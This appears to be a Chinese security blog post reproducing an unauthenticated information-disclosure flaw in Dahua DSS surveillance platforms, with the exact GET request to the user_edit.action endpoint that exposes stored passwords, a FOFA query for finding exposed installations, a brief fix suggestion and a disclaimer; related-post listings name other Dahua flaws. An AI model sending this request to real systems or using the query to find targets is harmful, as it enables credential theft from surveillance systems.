【复现】大华DSS信息泄露漏洞_15

最新推荐文章于 2024-03-27 10:33:51 发布
最新推荐文章于 2024-03-27 10:33:51 发布
阅读量1.2k 收藏 6
点赞数 23
分类专栏: 安全漏洞 文章标签: 安全 web安全 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fushuang333/article/details/135536715
版权

目录

一.概述

二 .漏洞影响

三.漏洞复现

1. 漏洞一:

四.修复建议:

五. 搜索语法:

六.免责声明

一.概述

DSS是大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。 可将视频监控、卡口拍照、 区间测速 、电子地图、违章查询系统等诸多主流应用整合在一起,实现更加智能、便捷的分级查询服务

二 .漏洞影响

未授权导致一些敏感信息会泄露,可能会造成系统危害。

三.漏洞复现

1. 漏洞一:

(1)漏洞类型:  信息泄露

(2)请求类型:GET

(3)复现

首页

请求页面响应,查看元素有password信息

burp响应

请求包

GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

四.修复建议:

设置跳转或者禁止访问

五. 搜索语法:

1.fofa

app="dahua-DSS"

六.免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

穿着白衣
关注
  • 23
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
漏洞复现大华 DSS user_edit.action 信息泄露漏洞
qq_67810151的博客
04-02 561
大华DSS存在信息泄露漏洞,攻击者可以通过该漏洞获取服务器敏感信息,造成大量敏感信息泄露
某购物商城系统commodtiy接口处存在任意文件上传漏洞
最新发布
weixin_43167326的博客
05-10 730
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
大华 DSS 登录接口Struct2-045漏洞复现 [附POC]
薛定谔嘚喵博客
12-18 614
大华 DSS只安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。大华DSS安防 监控系统Q平台采用ApacheStruts2作为网站应用框架。大华 DSS 登录接口存在 Struct2-045漏洞,可执行系统命令并回显。由于应用程序框架存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行该漏洞。系统命令以获取服务器权限。
漏洞复现大华DSS视频管理系统信息泄露漏洞
晚风不及你
02-20 1553
大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外,更注重用户使用的便利性。
大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现
holyxp的博客
12-18 2074
大华 DSs 数字监控系统是大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华 DSS存在SQL注入漏洞,攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如,管理员后台密码、站点的用户人人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限poc验证是否存在漏洞如果你想查询用户名和密码。
漏洞复现--大华ICC readpic任意文件读取漏洞
qq_53003652的博客
11-03 1149
对技术组件进行模块化和松耦合,将解决方案分层分级,提高面向智慧物联的数据接入与生态合作能力。ICC,即大华浩睿智能物联综合管理平台。该产品readpic存在任意文件读取漏洞大华ICC智能物联综合管理平台。
复现大华 DSS 数字监控系统 SQL 注入漏洞_18
fushuang333的博客
01-14 1442
复现大华 DSS 数字监控系统 SQL 注入漏洞大华DSS大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。
漏洞复现|大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞合集
weixin_44217321的博客
02-27 1040
大华智慧园区综合管理平台客户端由于前台缺少访问控制授权措施,可以从ip/WPMS进行定位,借助Payload进行漏洞触发,从而达到获取服务器数据的影响。大华园区综合管理平台/emap/webservice/gis/soap/bitmap接口处存在任意文件上传漏洞,恶意攻击者可能会上传后门文件,造成服务器失陷。大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
大华智慧园区综合管理平台RCE漏洞
holyxp的博客
07-17 1950
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。​ 大华智慧园区设备开放了文件上传功能,但未在上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到设备上,然后利用该漏洞获取权限并执行任意命令。
大华DSS平台SDK(客户端demo_win32_win64).zip
06-23
大华DSS平台SDK(客户端demo_win32_win64) 大华DSS视频监控客户端开发的演示 demo。其中包含 实时预览,录像回放与下载,云台控制,报警,语音对讲,ftp 图片,电视墙等 功能模块。
dss7.0up60_b23822.oe_i.rar
06-22
DSS Client 7.0 Choose the most popular programs from Audio & Video software
大华dss平台连接摄像头
11-06
这个webdemo可以通过连接大华dss平台来访问摄像头画面,包括云台的控制,画面回放等都可以实现。
大华DSS系列客户端操作手册.docx
08-10
操作平台
dss.rar_DSS数字签名_dss_pdf签名_数字签名_数字签名 代码
09-23
真正完整独立运行的数字签名和密钥交换C源代码,并有教学用的课件(PDF文件), 可以到http://zhou63.ahut.edu.cn/更新。
大华股份监控存在高危漏洞【附POC】
jijisaq的博客
03-27 774
同时,它还可以通过采集监控数据、提高管理监督效果,有效震慑违法犯罪行为的发生,并达到有效震慑违法犯罪行为的效果。大华DSS大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!今年肯定能“一帆风顺,二龙腾飞,三羊开泰,四季平安,五福临门,六六大顺,七星高照,八方来财,九九同心,十全十美,百事亨通,千事吉祥,万事如意“。
大华智慧园区管理平台任意密码读取漏洞 复现
薛定谔嘚喵博客
10-08 273
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务、摄像监控等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。 大华智慧园区综合管理平台存在任意密码读取漏洞,可以直接读取管理账号名以及其密码Hash值,造成未授权登入访问劫持园区管理平台,危害性高。
漏洞复现大华-DSS-user-edit-密码泄露
知黑而守白
02-02 149
DSS大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。可将视频监控、卡口拍照、 区间测速 、电子地图、违章查询系统等诸多主流应用整合在一起,实现更加智能、便捷的分级查询服务。大华DSS user_edit 接口处存在信息泄漏。攻击者可通过构造特定的数据包可以获取系统敏感信息
大华智慧园区综合管理平文件上传(附nuclei POC)、密码泄露漏洞
m0_46317063的博客
08-31 350
【代码】大华智慧园区综合管理平文件上传漏洞(附nuclei POC)
大华dss平台sdk
12-25
大华DSS平台SDK是大华公司提供的软件开发工具包,用于帮助开发者快速、高效地进行DSS平台的应用程序开发。该SDK包含了丰富的API和工具,可以帮助开发者实现视频监控、录像回放、远程操作等功能。 通过DSS平台SDK,开发者可以轻松地与大华的视频监控设备进行通信和交互,实现对设备的控制和管理。SDK还提供了丰富的图像处理和分析功能,可以帮助开发者开发出更加智能和高效的视频监控应用程序。 DSS平台SDK支持多种开发语言和平台,包括C/C++、Java、.NET等,可以在不同的操作系统和硬件平台上进行开发。这样就可以满足各种不同需求和环境下的应用开发需求。 另外,大华DSS平台SDK还提供了丰富的开发文档和示例代码,方便开发者学习和使用。开发者可以通过这些文档和示例快速上手,快速完成应用程序的开发和部署。 总之,大华DSS平台SDK是一款功能强大、易于使用的软件开发工具包,可以帮助开发者快速实现视频监控应用程序的开发和部署,提高开发效率,降低开发成本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

穿着白衣

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值